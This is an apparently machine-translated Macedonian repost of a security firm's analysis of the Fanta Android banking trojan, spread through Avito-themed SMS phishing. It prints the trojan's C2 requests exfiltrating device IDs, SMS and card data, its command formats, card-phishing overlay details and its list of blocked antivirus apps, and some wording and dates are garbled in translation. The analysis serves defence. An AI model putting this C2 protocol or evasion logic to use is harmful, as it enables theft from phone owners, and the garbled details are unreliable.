ProHoster > блог > интернет вести > Leisya, Fanta: нови тактики на стариот Android Trojan

Leisya, Fanta: нови тактики на стариот Android Trojan

Leisya, Fanta: нови тактики на стариот Android Trojan

Еден ден сакате да продадете нешто на Avito и, откако објавивте детален опис на вашиот производ (на пример, модул RAM), ќе ја добиете оваа порака:

Leisya, Fanta: нови тактики на стариот Android TrojanОткако ќе ја отворите врската, ќе видите навидум безопасна страница која ве известува, среќниот и успешен продавач, дека е направено купување:

Leisya, Fanta: нови тактики на стариот Android Trojan
Откако ќе кликнете на копчето „Продолжи“, датотеката APK со икона и име што инспирира доверба ќе се преземе на вашиот уред со Android. Инсталиравте апликација која поради некоја причина бараше права на AccessibilityService, потоа се појавија неколку прозорци и брзо исчезнаа и... Тоа е тоа.

Одите да го проверите салдото, но поради некоја причина вашата банкарска апликација повторно бара детали за вашата картичка. Откако ќе ги внесете податоците, се случува нешто страшно: поради некоја причина што ви е сè уште нејасна, парите почнуваат да исчезнуваат од вашата сметка. Се обидувате да го решите проблемот, но вашиот телефон се спротивставува: ги притиска копчињата „Назад“ и „Дома“, не се исклучува и не ви дозволува да активирате никакви безбедносни мерки. Како резултат на тоа, останувате без пари, вашата стока не е купена, збунети сте и се прашувате: што се случило?

Одговорот е едноставен: станавте жртва на Android Trojan Fanta, член на семејството Flexnet. Како се случи ова? Ајде сега да објасниме.

Авторите: Андреј Половинкин, помлад специјалист за анализа на малициозен софтвер, Иван Писарев, специјалист за анализа на малициозен софтвер.

Некои статистики

Семејството Flexnet на Android тројанци првпат стана познато уште во 2015 година. Во текот на прилично долг период на активност, семејството се прошири на неколку подвидови: Фанта, Лајмбот, Липтон итн. Тројанецот, како и инфраструктурата поврзана со него, не застануваат: се развиваат нови ефективни шеми за дистрибуција - во нашиот случај, висококвалитетни фишинг страници наменети за одреден корисник-продавач, а програмерите на Тројан ги следат модерните трендови во пишување вируси - додавање нова функционалност што овозможува поефикасно да се украдат пари од заразени уреди и да се заобиколат механизмите за заштита.

Кампањата опишана во овој напис е наменета за корисници од Русија; мал број заразени уреди се забележани во Украина, а уште помалку во Казахстан и Белорусија.

Иако Flexnet е во арената на Android Trojan веќе повеќе од 4 години и е детално проучен од многу истражувачи, тој сè уште е во добра форма. Почнувајќи од јануари 2019 година, потенцијалниот износ на штета е повеќе од 35 милиони рубли - и ова е само за кампањи во Русија. Во 2015 година, на подземни форуми се продаваа различни верзии на овој Андроид тројанец, каде што можеше да се најде и изворниот код на тројанецот со детален опис. Тоа значи дека статистиката за штети во светот е уште поимпресивна. Не е лош показател за таков старец, нели?

Leisya, Fanta: нови тактики на стариот Android Trojan

Од продажба до измама

Како што може да се види од претходно претставената слика од екранот на страницата за фишинг за Интернет услугата за објавување реклами Avito, таа е подготвена за одредена жртва. Очигледно, напаѓачите користат еден од парсерите на Avito, кој ги извлекува телефонскиот број и името на продавачот, како и описот на производот. По проширувањето на страницата и подготовката на датотеката АПК, на жртвата и се испраќа СМС со неговото име и врска до страницата за фишинг што содржи опис на неговиот производ и износот добиен од „продажбата“ на производот. Со кликнување на копчето, корисникот добива злонамерна APK-датотека - Fanta.

Студијата на доменот shcet491[.]ru покажа дека е делегиран на DNS серверите на Hostinger:

  • ns1.hostinger.ru
  • ns2.hostinger.ru
  • ns3.hostinger.ru
  • ns4.hostinger.ru

Датотеката со зона на домен содржи записи што укажуваат на IP адресите 31.220.23[.]236, 31.220.23[.]243 и 31.220.23[.]235. Сепак, записот за примарниот ресурс на доменот (A record) укажува на сервер со IP адреса 178.132.1[.]240.

IP адресата 178.132.1[.]240 се наоѓа во Холандија и му припаѓа на хостерот WorldStream. IP адресите 31.220.23[.]235, 31.220.23[.]236 и 31.220.23[.]243 се наоѓаат во ОК и припаѓаат на заедничкиот сервер за хостирање HOSTINGER. Се користи како рекордер openprov-ru. Следниве домени исто така се решени на IP адресата 178.132.1[.]240:

  • сделка-ру[.]ру
  • товар-ав[.]ру
  • ав-товар[.]ру
  • ру-сделка[.]ру
  • shcet382[.]ru
  • sdelka221[.]ru
  • sdelka211[.]ru
  • vyplata437[.]ru
  • viplata291[.]ru
  • perevod273[.]ru
  • perevod901[.]ru

Треба да се напомене дека врските во следниот формат беа достапни од речиси сите домени:

http://(www.){0,1}<%domain%>/[0-9]{7}

Овој шаблон вклучува и врска од СМС порака. Врз основа на историски податоци, беше откриено дека еден домен одговара на неколку врски во шемата опишана погоре, што укажува дека еден домен бил користен за дистрибуција на тројанецот на неколку жртви.

Ајде да скокнеме малку напред: тројанецот преземен преку врска од СМС ја користи адресата како контролен сервер onusedseddohap[.]клуб. Овој домен е регистриран на 2019 година и почнувајќи од 03 година, апликациите на АПК имаат интеракција со овој домен. Врз основа на податоците добиени од VirusTotal, вкупно 12 апликации имале интеракција со овој сервер. Самиот домен се реши на IP адресата 217.23.14[.]27, кој се наоѓа во Холандија и е во сопственост на домаќинот WorldStream. Се користи како рекордер споменик. Домените исто така се решени на оваа IP адреса bad-racoon[.]клуб (почнувајќи од 2018) и bad-racoon[.]во живо (почнувајќи од 2018-10-25). Со домен bad-racoon[.]клуб со повеќе од 80 АПК-датотеки во интеракција bad-racoon[.]во живо - повеќе од 100.

Генерално, нападот напредува на следниов начин:

Leisya, Fanta: нови тактики на стариот Android Trojan

Што има под капакот на Фанта?

Како и многу други Андроид тројанци, Фанта е способна да чита и испраќа СМС пораки, да прави USSD барања и да прикажува свои прозорци на врвот на апликациите (вклучувајќи ги и банкарските). Сепак, арсеналот на функционалност на ова семејство пристигна: Фанта почна да се користи Услуга за пристапност за различни цели: читање на содржината на известувањата од други апликации, спречување откривање и запирање на извршувањето на тројанец на заразен уред итн. Фанта работи на сите верзии на Android не помлади од 4.4. Во оваа статија внимателно ќе го разгледаме следниот примерок од Фанта:

  • MD5: 0826bd11b2c130c4c8ac137e395ac2d4
  • SHA1: ac33d38d486ee4859aa21b9aeba5e6e11404bcc8
  • SHA256: df57b7e7ac6913ea5f4daad319e02db1f4a6b243f2ea6500f83060648da6edfb

Веднаш по лансирањето

Веднаш по лансирањето, тројанецот ја крие својата икона. Апликацијата може да работи само ако името на заразениот уред не е на списокот:

  • android_x86
  • VirtualBox
  • Nexus 5X (bullhead)
  • Nexus 5 (жилет)

Оваа проверка се врши во главниот сервис на тројанецот - MainService. Кога се стартува за прв пат, параметрите за конфигурација на апликацијата се иницијализираат на стандардните вредности (форматот за складирање на конфигурациските податоци и нивното значење ќе се дискутира подоцна), а нов заразен уред е регистриран на контролниот сервер. Барање HTTP POST со типот на пораката ќе биде испратено до серверот register_bot и информации за заразениот уред (верзија на Android, IMEI, телефонски број, име на оператор и код на земја во која е регистриран операторот). Адресата служи како контролен сервер hXXp://onuseseddohap[.]club/controller.php. Како одговор, серверот испраќа порака што ги содржи полињата bot_id, bot_pwd, сервер — апликацијата ги зачувува овие вредности како параметри на CnC серверот. Параметар сервер изборно ако полето не е примено: Фанта ја користи адресата за регистрација - hXXp://onuseseddohap[.]club/controller.php. Функцијата за промена на адресата CnC може да се користи за решавање на два проблема: рамномерно да се дистрибуира оптоварувањето помеѓу неколку сервери (ако има голем број заразени уреди, оптоварувањето на неоптимизиран веб-сервер може да биде големо), а исто така и да се користи алтернативен сервер во случај на дефект на еден од CnC серверите.

Ако се појави грешка при испраќањето на барањето, тројанецот ќе го повтори процесот на регистрација по 20 секунди.

Откако уредот ќе биде успешно регистриран, Фанта ќе му ја прикаже следната порака на корисникот:

Leisya, Fanta: нови тактики на стариот Android Trojan
Важна забелешка: повикана е услугата Безбедност на системот — името на тројанската услуга и откако ќе кликнете на копчето OK Ќе се отвори прозорец со поставките за пристапност на заразениот уред, каде што корисникот мора да додели права за пристапност за злонамерната услуга:

Leisya, Fanta: нови тактики на стариот Android Trojan
Штом корисникот ќе се вклучи Услуга за пристапност, Фанта добива пристап до содржината на прозорците на апликациите и дејствата извршени во нив:

Leisya, Fanta: нови тактики на стариот Android Trojan
Веднаш по добивањето на правата за пристапност, тројанецот бара администраторски права и права да чита известувања:

Leisya, Fanta: нови тактики на стариот Android Trojan
Со помош на AccessibilityService, апликацијата симулира притискање на копчињата, а со тоа си ги дава сите потребни права.

Фанта создава повеќе примероци на база на податоци (кои ќе бидат опишани подоцна) неопходни за складирање на конфигурациските податоци, како и информациите собрани во процесот за заразениот уред. За да ги испрати собраните информации, тројанецот создава повторлива задача дизајнирана да презема полиња од базата на податоци и да прима команда од контролниот сервер. Интервалот за пристап до CnC е поставен во зависност од верзијата на Android: во случај на 5.1, интервалот ќе биде 10 секунди, инаку 60 секунди.

За да ја прими командата, Фанта прави барање GetTask до серверот за управување. Како одговор, CnC може да испрати една од следниве команди:

Тим Опис
0 Испратете СМС порака
1 Направете телефонски повик или команда USSD
2 Ажурира параметар интервал
3 Ажурира параметар интервенира
6 Ажурира параметар smsManager
9 Почнете да собирате СМС пораки
11 Ресетирајте го телефонот на фабрички поставки
12 Овозможи/оневозможи евидентирање на креирањето на дијалог прозорецот

Фанта исто така собира известувања од 70 банкарски апликации, системи за брзо плаќање и е-паричници и ги складира во база на податоци.

Зачувување на параметрите за конфигурација

За складирање на параметрите за конфигурација, Фанта користи стандарден пристап за платформата Android - Параметри-датотеки. Поставките ќе се зачуваат во датотека со име подесувања. Опис на зачуваните параметри е во табелата подолу.

име Стандардна вредност Можни вредности Опис
id 0 Цел број ID на бот
сервер hXXp://onuseseddohap[.]club/ URL Контролирајте ја адресата на серверот
ПВД - Стринг Лозинка на серверот
интервал 20 Цел број Временски интервал. Покажува колку долго треба да се одложат следните задачи:

  • Кога испраќате барање за статусот на испратената СМС порака
  • Примање нова команда од серверот за управување
интервенира сите сите/телБрој Ако полето е еднакво на низата сите или телБрој, тогаш примената СМС порака ќе биде пресретната од апликацијата и нема да му се покаже на корисникот
smsManager 0 0/1 Овозможете/оневозможете ја апликацијата како стандарден примач на СМС
readDialog лажни Вистински лажни Овозможи/оневозможи евиденција на настани Настан за пристапност

Фанта исто така ја користи датотеката smsManager:

име Стандардна вредност Можни вредности Опис
pckg - Стринг Име на користен управувач со СМС пораки

Интеракција со бази на податоци

За време на своето работење, тројанецот користи две бази на податоци. База на податоци именувана a се користи за складирање на различни информации собрани од телефонот. Втората база на податоци е именувана fanta.db и се користи за зачувување на поставките одговорни за креирање на фишинг прозорци дизајнирани да собираат информации за банкарски картички.

Тројан користи база на податоци а за складирање на собраните информации и евиденција на вашите дејства. Податоците се чуваат во табела логови. За да креирате табела, користете го следното SQL барање:

create table logs ( _id integer primary key autoincrement, d TEXT, f TEXT, p TEXT, m integer)

Базата на податоци ги содржи следните информации:

1. Пријавување на стартувањето на заразениот уред со порака Телефонот се вклучи!

2. Известувања од апликации. Пораката е генерирана според следниот образец:

(<%App Name%>)<%Title%>: <%Notification text%>

3. Податоци за банкарска картичка од форми за фишинг создадени од тројанецот. Параметар VIEW_NAME може да биде едно од следниве:

  • AliExpress
  • Avito
  • Google Play
  • Разно <%Име на апликација%>

Пораката е логирана во формат:

[<%Time in format HH:mm:ss dd.MM.yyyy%>](<%VIEW_NAME%>) Номер карты:<%CARD_NUMBER%>; Дата:<%MONTH%>/<%YEAR%>; CVV: <%CVV%>

4. Влезни/појдовни СМС пораки во формат:

([<%Time in format HH:mm:ss dd.MM.yyyy%>] Тип: Входящее/Исходящее) <%Mobile number%>:<%SMS-text%>

5. Информации за пакетот што го создава дијалог прозорецот во формат:

(<%Package name%>)<%Package information%>

Табела за пример логови:

Leisya, Fanta: нови тактики на стариот Android Trojan
Една од функционалностите на Фанта е собирање информации за банкарски картички. Собирањето податоци се случува преку креирање на фишинг прозорци при отворање банкарски апликации. Тројанецот го креира прозорецот за фишинг само еднаш. Информациите дека прозорецот му бил прикажан на корисникот се чуваат во табела подесувања во базата на податоци fanta.db. За да креирате база на податоци, користете го следново SQL барање:

create table settings (can_login integer, first_bank integer, can_alpha integer, can_avito integer, can_ali integer, can_vtb24 integer, can_telecard integer, can_another integer, can_card integer);

Сите полиња на табелата подесувања стандардно иницијализиран на 1 (создадете прозорец за фишинг). Откако корисникот ќе ги внесе своите податоци, вредноста ќе биде поставена на 0. Пример за полиња од табелата подесувања:

  • can_login — полето е одговорно за прикажување на формуларот при отворање банкарска апликација
  • прва_банка - не се користи
  • can_avito — полето е одговорно за прикажување на формуларот при отворање на апликацијата Avito
  • can_ali — полето е одговорно за прикажување на формуларот при отворање на апликацијата Aliexpress
  • може_друг — полето е одговорно за прикажување на формуларот при отворање на која било апликација од списокот: Јула, Пандао, Дром Авто, Паричник. Попуст и бонус картички, Aviasales, Резервации, Trivago
  • може_картичка — полето е одговорно за прикажување на формуларот при отворање Google Play

Интеракција со серверот за управување

Мрежната интеракција со серверот за управување се јавува преку протоколот HTTP. За да работи со мрежата, Фанта ја користи популарната библиотека Retrofit. Барањата се испраќаат до: hXXp://onuseseddohap[.]club/controller.php. Адресата на серверот може да се смени кога се регистрирате на серверот. Колачињата може да се испратат како одговор од серверот. Фанта ги упатува следните барања до серверот:

  • Регистрацијата на ботот на контролниот сервер се случува еднаш, при првото лансирање. Следниве податоци за заразениот уред се испраќаат до серверот:
    · Куки — колачиња добиени од серверот (стандардната вредност е празна низа)
    · на владата — константа на низа register_bot
    · префикс — целобројна константа 2
    · version_sdk — се формира според следниот образец: <%Build.MODEL%>/<%Build.VERSION.RELEASE%>(Avit)
    · imei — IMEI на заразениот уред
    · земјата — код на земјата во која операторот е регистриран, во ISO формат
    · број - телефонски број
    · оператор — име на оператор

    Пример за барање испратено до серверот:

    POST /controller.php HTTP/1.1
Cookie:
Content-Type: application/x-www-form-urlencoded
Content-Length: 144
Host: onuseseddohap.club
Connection: close
Accept-Encoding: gzip, deflate
User-Agent: okhttp/3.6.0

mode=register_bot&prefix=2&version_sdk=<%VERSION_SDK%>&imei=<%IMEI%>&country=<%COUNTRY_ISO%>&number=<%TEL_NUMBER%>&operator=<%OPERATOR_NAME%>

    Како одговор на барањето, серверот мора да врати JSON објект кој ги содржи следните параметри:
    · bot_id — ID на заразениот уред. Ако bot_id е еднаков на 0, Фанта повторно ќе го изврши барањето.
    bot_pwd — лозинка за серверот.
    сервер — контролирајте ја адресата на серверот. Факултативен параметар. Ако параметарот не е наведен, ќе се користи адресата зачувана во апликацијата.

    Пример JSON објект:

    {
    "response":[
   	 {
   		 "bot_id": <%BOT_ID%>,
   		 "bot_pwd": <%BOT_PWD%>,
   		 "server": <%SERVER%>
   	 }
    ],
    "status":"ok"
}

  • Барајте да добиете команда од серверот. Следниве податоци се испраќаат до серверот:
    · Куки — колачиња добиени од серверот
    · понуда — ID на заразениот уред што е примен при испраќање на барањето register_bot
    · ПВД — лозинка за серверот
    · divice_admin — полето одредува дали се добиени администраторски права. Ако се добиени администраторски права, полето е еднакво на 1, во спротивно 0
    · Пристапност — Статус на работа на услугата за пристапност. Ако услугата е започната, вредноста е 1, во спротивно 0
    · SMSManager — покажува дали тројанецот е овозможен како стандардна апликација за примање СМС
    · екран — прикажува во каква состојба е екранот. Вредноста ќе биде поставена 1, ако екранот е вклучен, во спротивно 0;

    Пример за барање испратено до серверот:

    POST /controller.php HTTP/1.1
Cookie:
Content-Type: application/x-www-form-urlencoded
Host: onuseseddohap.club
Connection: close
Accept-Encoding: gzip, deflate
User-Agent: okhttp/3.6.0

mode=getTask&bid=<%BID%>&pwd=<%PWD%>&divice_admin=<%DEV_ADM%>&Accessibility=<%ACCSBL%>&SMSManager=<%SMSMNG%>&screen=<%SCRN%>

    Во зависност од командата, серверот може да врати JSON објект со различни параметри:

    · Тим Испратете СМС порака: Параметрите го содржат телефонскиот број, текстот на SMS пораката и ID на пораката што се испраќа. Идентификаторот се користи кога се испраќа порака до серверот со тип setSmsStatus. 

    {
    "response":
    [
   	 {
   		 "mode": 0,
   		 "sms_number": <%SMS_NUMBER%>,
   		 "sms_text": <%SMS_TEXT%>,
   		 "sms_id": %SMS_ID%
   	 }
    ],
    "status":"ok"
}

    · Тим Направете телефонски повик или команда USSD: Телефонскиот број или командата доаѓа во телото за одговор. 

    {
    "response":
    [
   	 {
   		 "mode": 1,
   		 "command": <%TEL_NUMBER%>
   	 }
    ],
    "status":"ok"
}

    · Тим Променете го параметарот на интервалот. 

    {
    "response":
    [
   	 {
   		 "mode": 2,
   		 "interval": <%SECONDS%>
   	 }
    ],
    "status":"ok"
}

    · Тим Променете го параметарот за пресретнување. 

    {
    "response":
    [
   	 {
   		 "mode": 3,
   		 "intercept": "all"/"telNumber"/<%ANY_STRING%>
   	 }
    ],
    "status":"ok"
}

    · Тим Променете го полето SmsManager. 

    {
    "response":
    [
   	 {
   		 "mode": 6,
   		 "enable": 0/1
   	 }
    ],
    "status":"ok"
}

    · Тим Соберете СМС пораки од заразен уред.

    {
    "response":
    [
   	 {
   		 "mode": 9
   	 }
    ],
    "status":"ok"
}

    · Тим Ресетирајте го телефонот на фабрички поставки: 

    {
    "response":
    [
   	 {
   		 "mode": 11
   	 }
    ],
    "status":"ok"
}

    · Тим Променете го параметарот ReadDialog. 

    {
    "response":
    [
   	 {
   		 "mode": 12,
   		 "enable": 0/1
   	 }
    ],
    "status":"ok"
}

  • Испраќање порака со тип setSmsStatus. Ова барање се прави откако ќе се изврши командата Испратете СМС порака. Барањето изгледа вака:

POST /controller.php HTTP/1.1
Cookie:
Content-Type: application/x-www-form-urlencoded
Host: onuseseddohap.club
Connection: close
Accept-Encoding: gzip, deflate
User-Agent: okhttp/3.6.0

mode=setSmsStatus&id=<%ID%>&status_sms=<%PWD%>

  • Поставување на содржината на базата на податоци. Еден ред се пренесува по барање. Следниве податоци се испраќаат до серверот:
    · Куки — колачиња добиени од серверот
    · на владата — константа на низа setSaveInboxSms
    · понуда — ID на заразениот уред што е примен при испраќање на барањето register_bot
    · текст — текст во тековниот запис на базата на податоци (поле d од масата логови во базата на податоци а)
    · број — име на тековниот запис на базата на податоци (поле p од масата логови во базата на податоци а)
    · sms_mode - цела вредност (поле m од масата логови во базата на податоци а)

    Барањето изгледа вака:

    POST /controller.php HTTP/1.1
Cookie:
Content-Type: application/x-www-form-urlencoded
Host: onuseseddohap.club
Connection: close
Accept-Encoding: gzip, deflate
User-Agent: okhttp/3.6.0

mode=setSaveInboxSms&bid=<%APP_ID%>&text=<%a.logs.d%>&number=<%a.logs.p%>&sms_mode=<%a.logs.m%>

    Ако е успешно испратен до серверот, редот ќе биде избришан од табелата. Пример за JSON објект вратен од серверот:

    {
    "response":[],
    "status":"ok"
}

Интеракција со AccessibilityService

AccessibilityService беше имплементиран за да ги олесни користењето на уредите со Android за лицата со посебни потреби. Во повеќето случаи, потребна е физичка интеракција за интеракција со апликација. AccessibilityService ви овозможува да ги правите програмски. Фанта ја користи услугата за да креира лажни прозорци во банкарските апликации и да ги спречи корисниците да отвораат системски поставки и некои апликации.

Користејќи ја функционалноста на AccessibilityService, тројанецот ги следи промените на елементите на екранот на заразениот уред. Како што беше претходно опишано, поставките за Фанта содржат параметар одговорен за операциите за евиденција со дијалог-кутија - readDialog. Ако овој параметар е поставен, информациите за името и описот на пакетот што го активира настанот ќе се додадат во базата на податоци. Тројанецот ги извршува следните дејства кога се активираат настани:

  • Симулира притискање на копчињата за назад и дома во следниве случаи:
    · ако корисникот сака да го рестартира својот уред
    · ако корисникот сака да ја избрише апликацијата „Avito“ или да ги промени правата за пристап
    · ако на страницата се споменува апликацијата „Avito“.
    · при отворање на апликацијата Google Play Protect
    · кога отворате страници со поставки за AccessibilityService
    · кога ќе се појави полето за дијалог System Security
    · кога ја отворате страницата со поставките „Нацртајте преку друга апликација“.
    · при отворање на страницата „Апликации“, „Обнова и ресетирање“, „Ресетирање податоци“, „Ресетирај поставки“, „Програмерски панел“, „Специјални. можности“, „Посебни можности“, „Посебни права“
    · доколку настанот е генериран од одредени апликации.

    Список на апликации

    • андроид
    • Master Lite
    • Чист господар
    • Clean Master за x86 CPU
    • Управување со дозволи за апликација на Meizu
    • MIUI безбедност
    • Чист мајстор - антивирус и кеш и чистење ѓубре
    • Родителски контроли и GPS: Kaspersky SafeKids
    • Kaspersky Antivirus AppLock и Web Security Beta
    • Чистач на вируси, антивирус, чистач (MAX Security)
    • Mobile Antivirus Security PRO
    • Avast антивирус и бесплатна заштита 2019 година
    • Мобилна безбедност Мегафон
    • AVG заштита за Xperia
    • Мобилна безбедност
    • Антивирус и заштита од малициозен софтвер
    • Антивирус за Андроид 2019 година
    • Мајстор за безбедност - антивирус, VPN, AppLock, засилувач
    • AVG антивирус за Системски менаџер за таблети Huawei
    • Пристапност на Samsung
    • Паметен менаџер на Samsung
    • Мајстор за безбедност
    • Засилувач на брзината
    • Д-р Веб
    • Безбедносен простор на Dr.Web
    • Др.Веб мобилен контролен центар
    • Dr.Web Security Space Life
    • Др.Веб мобилен контролен центар
    • Антивирус и мобилна безбедност
    • Kaspersky Internet Security: антивирус и заштита
    • Траење на батеријата на Kaspersky: Штедач и засилувач
    • Kaspersky Endpoint Security - заштита и управување
    • AVG Antivirus free 2019 – Заштита за Android
    • Антивирусен Андроид
    • Нортон мобилна безбедност и антивирус
    • Антивирус, заштитен ѕид, VPN, мобилна безбедност
    • Мобилна безбедност: антивирус, VPN, заштита од кражба
    • Антивирус за Андроид

  • Ако се бара дозвола при испраќање СМС порака на краток број, Фанта симулира кликнување на полето за избор Запомнете го изборот и копче испрати.
  • Кога се обидувате да ги одземете администраторските права од тројанецот, тој го заклучува екранот на телефонот.
  • Спречува додавање нови администратори.
  • Ако антивирусната апликација др.веб откриле закана, Фанта имитира притискање на копчето игнорирај.
  • Тројанецот симулира притискање на копчето за назад и дома ако настанот е генериран од апликацијата Нега на уредот Samsung.
  • Фанта создава „фишинг“ прозорци со формулари за внесување информации за банкарските картички доколку биде лансирана апликација од списокот со околу 30 различни интернет услуги. Меѓу нив: AliExpress, Booking, Avito, Google Play Market Component, Pandao, Drom Auto итн.

    Формулари за фишинг

    Фанта анализира кои апликации работат на заразениот уред. Ако е отворена апликација од интерес, тројанецот прикажува phishing прозорец над сите други, што е форма за внесување информации за банкарска картичка. Корисникот мора да ги внесе следните податоци:

    • Број на картичка
    • Датум на истекување на картичката
    • CVV
    • Име на сопственикот на картичката (не за сите банки)

    Во зависност од апликацијата која работи, ќе се прикажат различни прозорци за фишинг. Подолу се дадени примери на некои од нив:

    Алиекспрес:

    Leisya, Fanta: нови тактики на стариот Android Trojan
    Авито:

    Leisya, Fanta: нови тактики на стариот Android Trojan
    За некои други апликации, на пр. Google Play Market, Aviasales, Pandao, Booking, Trivago:
    Leisya, Fanta: нови тактики на стариот Android Trojan

    Како навистина беше

    За среќа, лицето кое ја примило СМС пораката опишана на почетокот на статијата се покажало дека е специјалист за сајбер безбедност. Затоа, вистинската, не-режисерска верзија се разликува од онаа што беше кажано претходно: едно лице доби интересна СМС-порака, по што му ја даде на тимот за разузнавање за лов на закани Group-IB. Резултатот од нападот е овој напис. Среќен крај, нели? Сепак, не завршуваат сите приказни толку успешно и за да не изгледа вашата режисерска резба со загуба на пари, во повеќето случаи доволно е да се придржувате до следните долго опишани правила:

    • не инсталирајте апликации за мобилен уред со Android OS од други извори освен Google Play
    • Кога инсталирате апликација, обрнете посебно внимание на правата што ги бара апликацијата
    • обрнете внимание на наставките на преземените датотеки
    • редовно инсталирајте ажурирања на Android OS
    • не посетувајте сомнителни ресурси и не преземајте датотеки од таму
    • Не кликајте на линковите примени во СМС пораките.

Извор: www.habr.com

Додадете коментар